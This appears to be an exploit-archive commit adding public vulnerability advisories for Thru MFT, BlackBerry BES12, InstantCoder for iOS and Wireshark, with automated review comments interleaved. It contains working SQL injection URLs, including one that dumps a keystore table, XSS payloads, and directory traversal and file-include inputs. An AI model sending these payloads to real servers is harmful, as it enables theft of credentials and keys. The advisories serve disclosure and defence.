DB: 2016-02-23

7 new exploits
Offensive Security 2016-02-23 05:02:07 +00:00
parent 897e728c20
commit f7b6199767
8 changed files with 970 additions and 0 deletions

@ -33631,6 +33631,7 @@ id,file,description,date,author,platform,type,port
37266,platforms/php/webapps/37266.txt,"ClickHeat <= 1.14 Change Admin Password CSRF",2015-06-12,"David Shanahan",php,webapps,80
37249,platforms/linux/dos/37249.py,"Libmimedir VCF Memory Corruption PoC",2015-06-10,"Jeremy Brown",linux,dos,0
37250,platforms/xml/webapps/37250.txt,"HP WebInspect <= 10.4 XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0
39479,platforms/ios/webapps/39479.txt,"InstantCoder 1.0 iOS - Multiple Vulnerabilities",2016-02-22,Vulnerability-Lab,ios,webapps,0
37298,platforms/hardware/webapps/37298.txt,"Apexis IP CAM - Information Disclosure",2015-06-16,"Sunplace Solutions",hardware,webapps,80
37299,platforms/windows/dos/37299.py,"XtMediaPlayer 0.93 (.wav) - Crash PoC",2015-06-16,"SATHISH ARTHAR",windows,dos,0
37300,platforms/windows/dos/37300.py,"FinePlayer 2.20 (.mp4) - Crash PoC",2015-06-16,"SATHISH ARTHAR",windows,dos,0
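Review bot: Row 39479 is placed between 37250 and 37298, among entries in the 372xx range dated 2015-06, while the other six entries added by this commit are appended at the end of the file in the next hunk, where 39479 would sit between 39478 and 39480. Anything that treats the tail of files.csv as "the newest entries" will miss this row. Move it to the end with the others, or say in the commit message why it belongs here.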
@ -35716,3 +35717,9 @@ id,file,description,date,author,platform,type,port
39476,platforms/multiple/dos/39476.txt,"Adobe Flash - SimpleButton Creation Type Confusion",2016-02-19,"Google Security Research",multiple,dos,0
39477,platforms/windows/webapps/39477.txt,"ManageEngine Firewall Analyzer 8.5 - Multiple Vulnerabilities",2016-02-19,"Sachin Wagh",windows,webapps,8500
39478,platforms/php/webapps/39478.txt,"SOLIDserver <=5.0.4 - Local File Inclusion Vulnerability",2016-02-20,"Saeed reza Zamanian",php,webapps,0
39480,platforms/windows/local/39480.py,"Core FTP Server 1.2 - Buffer Overflow PoC",2016-02-22,INSECT.B,windows,local,0
39481,platforms/java/webapps/39481.txt,"BlackBerry Enterprise Service < 12.4 (BES12) Self-Service - Multiple Vulnerabilities",2016-02-22,Security-Assessment.com,java,webapps,0
39482,platforms/multiple/dos/39482.txt,"Wireshark - dissect_oml_attrs Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0
39483,platforms/multiple/dos/39483.txt,"Wireshark - add_ff_vht_compressed_beamforming_report Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0
39484,platforms/multiple/dos/39484.txt,"Wireshark - dissect_ber_set Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0
39485,platforms/asp/webapps/39485.txt,"Thru Managed File Transfer Portal 9.0.2 - SQL Injection",2016-02-22,"SySS GmbH",asp,webapps,80
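Review bot: The port column is filled inconsistently across the new webapps rows: 39485 carries 80 while 39481 carries 0, although the proof-of-concept URLs in the 39481 advisory are all of the form https://<server>/..., and the context row 39477 records its service port (8500). Record the service port for 39481 as well, or document what 0 stands for, so that filtering the index by port does not silently skip web entries.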

126
platforms/asp/webapps/39485.txt Executable file
@ -0,0 +1,126 @@
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Advisory ID: SYSS-2015-056
Product: Thru Managed File Transfer Portal
Manufacturer: Thru
Affected Version(s): 9.0.2
Tested Version(s): 9.0.2
Vulnerability Type: SQL Injection (CWE-89)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2015-10-28
Solution Date: 2016-01-22
Public Disclosure: 2016-02-15
CVE Reference: Not yet assigned
Authors of Advisory: Dr. Erlijn van Genuchten, Danny Österreicher
(SySS GmbH)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
Thru Managed File Transfer Portal is a web based file transfer application.
According to the Thru website [1], the application aims to offload large
file transfer to a single platform, to protect files, to replace FTP
servers and to allow access to files anytime, anywhere.
An SQL injection vulnerability was identified in one of the GET request.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
The SQL injection vulnerability was found in a GET request that causes
contact data to be sorted. At least the attribute values of sortorder
and letterrange are not correctly sanitized and therefore can be abused
to inject arbitrary SQL statements.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
The following HTTP request can be used to show that the SQL statement
causing a delay is executed and results in a 500 server error:
GET /App/asp///contacts.asp?sortorder=1;WAITFOR+DELAY+'0:0:5'--&letterrange=all&fromrec=0&torec=20 HTTP/1.1
Host: [HOST]
Cookie: [COOKIES]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
The reported security vulnerability has been fixed in a new software
release. Update to the new software version.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2015-10-27: Vulnerability discovered
2015-10-28: Vulnerability reported to manufacturer
2016-01-22: Manufacturer announced update
2016-02-15: Public release of security advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] Thru Homepage
http://www.thruinc.com
[2] SySS Security Advisory SYSS-2015-056
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-056.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Credits:
This security vulnerability was found by Dr. Erlijn van Genuchten and
Danny Österreicher of the SySS GmbH.
E-Mail: erlijn.vangenuchten@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Erlijn_vanGenuchten.asc
Key ID: 0xBD96FF2A
Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A
E-Mail: danny.oesterreicher@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Danny_Oesterreicher.asc
Key ID: 0x96029AC7
Key Fingerprint: 0B53 8B52 9B5F 39C9 68F5 18C9 9284 FCEB 9602 9AC7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright:
Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIcBAEBCgAGBQJWwbbpAAoJEAylhje9lv8qAh4P/1yg6xg5xHvvnh2Al1fy/ley
rABwBv9YmcNhNLASrxPOXGBx6rcuCc5zEdOI62PKv4E19VMcjOvwHw5MzfP/4GDu
LAAku71zIn6YCxYF1NKScyqDeBg6OZfHiW6EP/ufhFD+pzu0FySmj2G3/lflloEX
FBNHzNURGakWizxzaNbnnltI3DuxPss3E67crJMHEPtXUw0dVrQAeMtsyc46708z
pWh1JAvNNIlqyyQwyy3EOvQtOIkYd8SMmayla2CUpl0xC5On5GcxkqvaZcqyScR9
s4rxVS8x7akGDGS/F2aFM2zEfCL5DAXVCoRWTyKYqcMYINdZY3xuREcG3iOXVMrp
yRYBg6dgwf3QHRmCrkZLlKx6hibHG13dRykD7LPcO3H+q81Ll4T/6OuHqbHbPjD2
EeOqW+bKDn//TKrsUbwvaM/1hF96T66QLRvUeTGHbMoNjN3fQTTqdBaYHq8ROiD8
Xc1ybVxgxUMKi+3WEvOw5aYF6Q/RN9Z4WN2p88+MLrBRFCh6nHT0jPKZFyxZuooi
b3MI/qPawWO4HfpjvunCdNGo49I34JCcAsi2Um8qzM/aedbUaH1dqj6sZW4j8bA2
WzwXgwnLXQ+wON/tCDz8Q4NfZWbDG2v1anJBOTIgABjLAeuo0nDaBYonyp4lY/Og
4UaL7kboaGGj3mRINLd8
=df2e
-----END PGP SIGNATURE-----
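Review bot: The header field "Solution Status: Open" contradicts the rest of the advisory, which gives "Solution Date: 2016-01-22" and states in the Solution section that the issue "has been fixed in a new software release", without naming the fixed version anywhere. Someone triaging a 9.0.2 install cannot tell from this entry which release to move to. Because the text is PGP clear-signed, editing it in place would invalidate the signature, so compare it against the upstream copy in reference [2] and record any clarification outside the signed block. Separately, the file is added as "Executable file" although it is a plain-text advisory; it should not carry the executable bit.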

298
platforms/ios/webapps/39479.txt Executable file
@ -0,0 +1,298 @@
Document Title:
===============
InstantCoder v1.0 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1738
Release Date:
=============
2016-02-22
Vulnerability Laboratory ID (VL-ID):
====================================
1738
Common Vulnerability Scoring System:
====================================
7
Product & Service Introduction:
===============================
You are one of the best developers in the world and you would like to code anytime, anywhere. CuteCoder makes it possible
for your to code and debug web apps on your lovely iPhone and iPad.
(Copy of the Homepage: https://itunes.apple.com/ai/app/instantcoder/id1067517686 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered multiple vulnerabilities in the official InstantCoder mobile iOS web-application.
Vulnerability Disclosure Timeline:
==================================
2016-02-22: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Shumin Sun
Product: InstantCoder - iOS (Web-Application) 1.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official InstantCoder v1.0 iOS mobile web-application (wifi).
The file include vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path
commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `./toolkit/upload` module. Remote attackers are able to inject own
files with malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application. The local
file/path include execution occcurs in the index file dir listing and sub folders of the wifi interface. The attacker is able to
inject the lfi payload by usage of the wifi interface or local file sync function.
Attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious
attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] ./toolkit/upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080/)
1.2
A directory traversal web vulnerability has been discovered in the official InstantCoder v1.0 iOS mobile web-application (wifi).
The vulnerability allows remote attackers to unauthorized access path variables to compromise the web-application or mobile device.
The directory traversal web vulnerability is located in the `path` value of the `listFiles` module. Remote attackers are able to
manipulate the path variable GET or POST method request to compromise the application. The request method to inject the payload is
POST and the request method to execute is GET. The attack vector of the vulnerability is located on the application-side. The path
variable is not encoded or parsed. Thus allows an attacker to inject to unauthorized access the local system or app path.
The security risk of the path traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.0.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application (wifi ui) user account.
Successful exploitation of the path traversal vulnerability results in mobile application compromise or compromise of connected device components.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] ./listFiles
Vulnerable Parameter(s):
[+] path
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080/)
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by remote attackers with wifi panel access and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Payload
http://localhost:8080/toolkit/index.html./[LOCAL FILE INCLUDE VULNERABILITY!]
PoC: Vulnerable Source
javascript:changePath("./[LOCAL FILE INCLUDE VULNERABILITY!]");
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost:8080/toolkit/upload?path= Load Flags[LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[162] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/toolkit/index.html]
Content-Length[819]
Content-Type[multipart/form-data; boundary=---------------------------29343138867419]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------29343138867419
Content-Disposition: form-data; name="path"
-----------------------------29343138867419
Content-Disposition: form-data; name="upload1"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]"
Content-Type: image/png
-
Status: 200[OK]
GET http://localhost:8080/toolkit/index.html Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[4995] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Header:
Accept-Ranges[bytes]
Content-Length[4995]
Date[Mon, 22 Feb 2016 08:33:04 GMT]
Reference(s):
http://localhost:8080/toolkit/upload
http://localhost:8080/toolkit/index.html
1.2
Thedirectory traversal web vulnerability can be exploited by remote attackers with wifi panel access and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Payload
http://localhost:8080/listFiles?path=./.././../../../../../../../../../../
PoC: Vulnerable Source
<p></p>
<div id="list-file"><a href="javascript:changePath("/.././../../../../../../../../../../etc/%00");">
<div class="folder"><img><iframe></div></a></iframe></div></a></div>
</div>
Status: 200[OK]
POST http://localhost:8080/listFiles?path=/ Load Flags[LOAD_BACKGROUND VALIDATE_ALWAYS LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[162] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/toolkit/index.html]
Connection[keep-alive]
Content-Length[0]
Response Header:
Accept-Ranges[bytes]
Content-Length[162]
Date[Mon, 22 Feb 2016 08:09:34 GMT]
-
Status: 200[OK]
POST http://localhost:8080/listFiles?path=/.././../../../../../../../../../../etc/%00 Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/toolkit/index.html]
Connection[keep-alive]
Content-Length[0]
Response Header:
Accept-Ranges[bytes]
Content-Length[2]
Date[Mon, 22 Feb 2016 08:09:37 GMT]
-
Status: 200[OK]
POST http://localhost:8080/listFiles?path=./.././../../../../../../../../../../ Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost:8080/toolkit/index.html]
Connection[keep-alive]
Content-Length[0]
Response Header:
Accept-Ranges[bytes]
Content-Length[2]
Date[Mon, 22 Feb 2016 08:09:45 GMT]
Reference(s):
http://localhost:8080/listFiles
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.7)
1.2
The security risk of the directory traversal web vulnerability in the list path GET method request is estimated as high. (CVSS 7.0)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research@vulnerability-lab.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
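Review bot: The scores for issue 1.1 disagree inside the file: the technical details give a "cvss ... count of 6.4" while the Security Risk section gives "(CVSS 6.7)", and the header lists a single score of 7. Section 1.2 has similar inconsistencies: Request Method(s) lists POST but Security Risk says "GET method request", and its exploitation sentence refers to the "local file include web vulnerability" in the directory traversal section. The product introduction also names "CuteCoder" rather than InstantCoder. There is no Solution or Fix section, so the entry records no remediation status; cross-check these points against the source (vulnerability-lab.com id 1738) before indexing.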

149
platforms/java/webapps/39481.txt Executable file
@ -0,0 +1,149 @@
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
BlackBerry Enterprise Service 12 (BES12) Self-Service
Affected versions: BES12 < 12.4
CVE: CVE-2016-1914 and CVE-2016-1915
PDF:
http://security-assessment.com/files/documents/advisory/Blackberry%20BES12%20Self-Service%20Multiple%20Vulnerabilities.pdf
+-----------+
|Description|
+-----------+
Blackberry BES12 is an enterprise mobile management solution and
contains a self-service web application available to mobile users. This
web application contains multiple vulnerabilities including
unauthenticated SQL
injection and reflected cross site scripting.
Limited access to an on-premise BES12 environment was provided during
the discovery of these vulnerabilities. The full impact of the
vulnerabilities in relation to compromising other portions of the BES12
solution, such as mobile devices, is unclear.
+------------+
|Exploitation|
+------------+
*SQL Injection*
The Java servlet com.rim.mdm.ui.server.ImageServlet is vulnerable to SQL
injection via the imageName parameter. This servlet is exposed at
multiple paths and is used to fetch an image from the database:
/mydevice/client/image
/admin/client/image
/myapps/client/image
/ssam/client/image
/all/client/image
This was discovered on a production BES12 on-premise deployment and the
injection vector allowed both UNION and stacked queries to be executed
on the Microsoft SQL server used by BES12. This allows full read/write
access to the database, and can potentially result in command execution
via xp_cmdshell depending on the database user configuration.
The following proof of concept demonstrates an injection payload which
will select the entire obj_keystore_entry table. The query will
serialise the entire table into an XML document which is returned in the
HTTP response as UTF-16 without the leading BOM (byte order mark)
causing most text editors to fail to display the response correctly.
https://<server>/mydevice/client/image?imageName=ui.cobranded.login.logo'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,(SELECT+*+FROM+obj_keystore_entry+FOR+XML+PATH(''))+--
The technique above can be used to download any database table available
to the BES12 database user.
Notable database tables are:
* obj_user which contains BES12 user details.
* obj_user_authentication which contains authentication tokens.
* obj_user_device which based on column names, contains enrolment
tokens, enrolment secrets and device encryption keys.
It is unclear if this information is sufficient to decrypt a lost/stolen
BES12 mobile device.
*Reflected Cross Site Scripting*
Two areas of the self-service web application exist where user-supplied
input is reflected directly in web pages, allowing a malicious user to
conduct Cross Site Scripting (XSS) attacks against users of the
application. While the application uses the HttpOnly cookie flag for
session tokens, successful exploitation allows malicious JavaScript to
perform any action within the application that the targeted user is able
to. The administrative web application is typically hosted on the same
domain and may be attacked using these XSS vectors, although this is
BES12 deployment specific.
The table below details where Cross Site Scripting was detected and
which parameters are vulnerable:
https://<server>/mydevice/index.jsp?locale="><script>alert(1)</script>
https://<server>/mydevice/loggedOut.jsp?locale="><script>alert(1)</script>
+----------+
| Solution |
+----------+
Upgrade to BES12.4.
+-------------------+
|Disclosure Timeline|
+-------------------+
Initial disclosure to Blackberry 19 Nov 2015
Disclosure receipt confirmed by Blackberry 19 Nov 2015
Request for update from Blackberry 7 Dec 2015
Vulnerabilities confirmed by Blackberry 8 Dec 2015
Blackberry confirms fixes will be released as part of BES12.4 28 Jan 2016
BES12.4 released 29 Jan 2016
Advisory released 15 Feb 2016
+-----------------------------+
|About Security-Assessment.com|
+-----------------------------+
Security-Assessment.com is a leading team of Information Security
consultants specialising in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients
include some of the largest globally recognised companies in areas such
as finance, telecommunications, broadcasting, legal and government. Our
aim is to provide the very best independent advice and a high level of
technical expertise while creating long and lasting professional
relationships with our clients.
Security-Assessment.com is committed to security research and
development, and its team continues to identify and responsibly publish
vulnerabilities in public and private software vendor's products.
Members of the Security-Assessment.com R&D team are globally recognised
through their release of whitepapers and presentations related to new
security research.
For further information on this issue or any of our service offerings,
contact us:
Web www.security-assessment.com
Email info@security-assessment.com
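Review bot: In the Reflected Cross Site Scripting section, "The table below details where Cross Site Scripting was detected and which parameters are vulnerable" is followed only by two bare URLs, so the table appears to have been lost in the text conversion and the affected parameter (locale, on index.jsp and loggedOut.jsp) has to be inferred from the query strings. Restore the page/parameter listing from the linked PDF or reword the sentence. The CVE line lists CVE-2016-1914 and CVE-2016-1915 without saying which covers the SQL injection and which the XSS; add that mapping from the source advisory. The Description also has a stray line break between "unauthenticated SQL" and "injection".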

@ -0,0 +1,98 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=656
The following crash due to an out-of-bounds read from static memory can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==5092==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f72db15e078 at pc 0x7f72cffb364f bp 0x7ffe98a8b690 sp 0x7ffe98a8b688
READ of size 4 at 0x7f72db15e078 thread T0
#0 0x7f72cffb364e in dissect_oml_attrs wireshark/epan/dissectors/packet-gsm_abis_oml.c:1544:17
#1 0x7f72cffb3286 in dissect_oml_fom wireshark/epan/dissectors/packet-gsm_abis_oml.c:1799:11
#2 0x7f72cffb2cbe in dissect_abis_oml wireshark/epan/dissectors/packet-gsm_abis_oml.c:1861:13
#3 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#4 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#5 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8
#6 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#7 0x7f72cf11e344 in call_dissector wireshark/epan/packet.c:2692:9
#8 0x7f72cffc53b7 in dissect_ipa wireshark/epan/dissectors/packet-gsm_ipa.c:333:5
#9 0x7f72cffc4dab in dissect_ipa_tcp wireshark/epan/dissectors/packet-gsm_ipa.c:376:2
#10 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#11 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#12 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#13 0x7f72d10c59dd in decode_tcp_ports wireshark/epan/dissectors/packet-tcp.c:4615:9
#14 0x7f72d10cb043 in process_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4668:13
#15 0x7f72d10c639c in dissect_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4743:9
#16 0x7f72d10db7a3 in dissect_tcp wireshark/epan/dissectors/packet-tcp.c:5575:13
#17 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#18 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#19 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#20 0x7f72d022188b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#21 0x7f72d022c2b9 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#22 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#23 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#24 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#25 0x7f72cf114964 in dissector_try_uint wireshark/epan/packet.c:1174:9
#26 0x7f72cfd3348d in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
#27 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#28 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#29 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8
#30 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#31 0x7f72cfd2f725 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
#32 0x7f72cfd27f33 in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
#33 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#34 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#35 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#36 0x7f72cfe235f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#37 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#38 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#39 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8
#40 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#41 0x7f72cf10f33b in dissect_record wireshark/epan/packet.c:501:3
#42 0x7f72cf0bd3c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#43 0x5264eb in process_packet wireshark/tshark.c:3728:5
#44 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#45 0x515daf in main wireshark/tshark.c:2197:13
0x7f72db15e078 is located 0 bytes to the right of global variable 'nm_att_tlvdef_base' defined in 'packet-gsm_abis_oml.c:1356:30' (0x7f72db15d880) of size 2040
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-gsm_abis_oml.c:1544:17 in dissect_oml_attrs
Shadow bytes around the buggy address:
0x0feedb623bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0feedb623bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0feedb623bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0feedb623be0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0feedb623bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0feedb623c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f9]
0x0feedb623c10: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0feedb623c20: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0feedb623c30: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0feedb623c40: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
0x0feedb623c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
